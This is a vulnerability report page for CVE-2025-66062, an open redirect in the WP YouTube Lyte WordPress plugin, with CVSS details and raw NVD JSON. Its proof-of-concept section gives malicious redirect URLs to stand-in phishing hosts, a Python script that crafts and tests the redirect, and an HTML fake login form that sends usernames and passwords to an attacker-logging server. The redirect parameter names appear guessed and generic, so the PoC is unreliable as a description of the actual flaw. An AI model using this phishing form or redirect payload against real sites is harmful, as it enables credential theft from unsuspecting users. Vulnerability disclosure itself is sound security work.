Security Vulnerability Report
中文
CVE-2025-66062 CVSS 3.4 LOW

CVE-2025-66062

Published: 2025-11-21 13:15:47
Last Modified: 2026-04-27 18:16:32
Source: [email protected]

Description

URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Frank Goossens WP YouTube Lyte wp-youtube-lyte allows Phishing.This issue affects WP YouTube Lyte: from n/a through <= 1.7.28.

CVSS Details

CVSS Score
3.4
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WP YouTube Lyte <= 1.7.28

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
## CVE-2025-66062 PoC - WP YouTube Lyte Open Redirect ### Attack Vector: # A attacker crafts a malicious URL with redirect parameter # User clicks on the link thinking it's from trusted site # User gets redirected to attacker's phishing site ### Example Malicious URLs: # http://target-site.com/?redirect=http://evil-phishing-site.com # http://target-site.com/wp-youtube-lyte/?lyte_redirect=http://malicious-site.com # http://target-site.com/?url=http://attacker-controlled-site.com&action=redirect ### Python PoC: import requests target_domain = "http://vulnerable-wordpress-site.com" malicious_domain = "http://evil-phishing-site.com" # Construct malicious redirect URL malicious_url = f"{target_domain}/?redirect={malicious_domain}" print(f"[*] Target: {target_domain}") print(f"[*] Malicious Redirect: {malicious_domain}") print(f"[*] Crafted URL: {malicious_url}") # Test if redirect is possible (should return 301/302) response = requests.get(malicious_url, allow_redirects=False) print(f"[*] Status Code: {response.status_code}") if response.status_code in [301, 302, 303]: print(f"[*] Redirect Location: {response.headers.get('Location')}") print("[!] Vulnerability Confirmed: Open Redirect is possible") else: print("[-] No redirect detected") ### HTML Phishing Page Example: html_template = ''' <!DOCTYPE html> <html> <head><title>Login Required</title></head> <body> <h1>Please Login to Continue</h1> <form action="http://attacker-logging-server.com/steal"> <input type="text" name="username" placeholder="Username"> <input type="password" name="password" placeholder="Password"> <button type="submit">Login</button> </form> </body> </html> '''

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66062", "sourceIdentifier": "[email protected]", "published": "2025-11-21T13:15:47.050", "lastModified": "2026-04-27T18:16:32.137", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Frank Goossens WP YouTube Lyte wp-youtube-lyte allows Phishing.This issue affects WP YouTube Lyte: from n/a through <= 1.7.28."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N", "baseScore": 3.4, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-youtube-lyte/vulnerability/wordpress-wp-youtube-lyte-plugin-1-7-28-open-redirection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.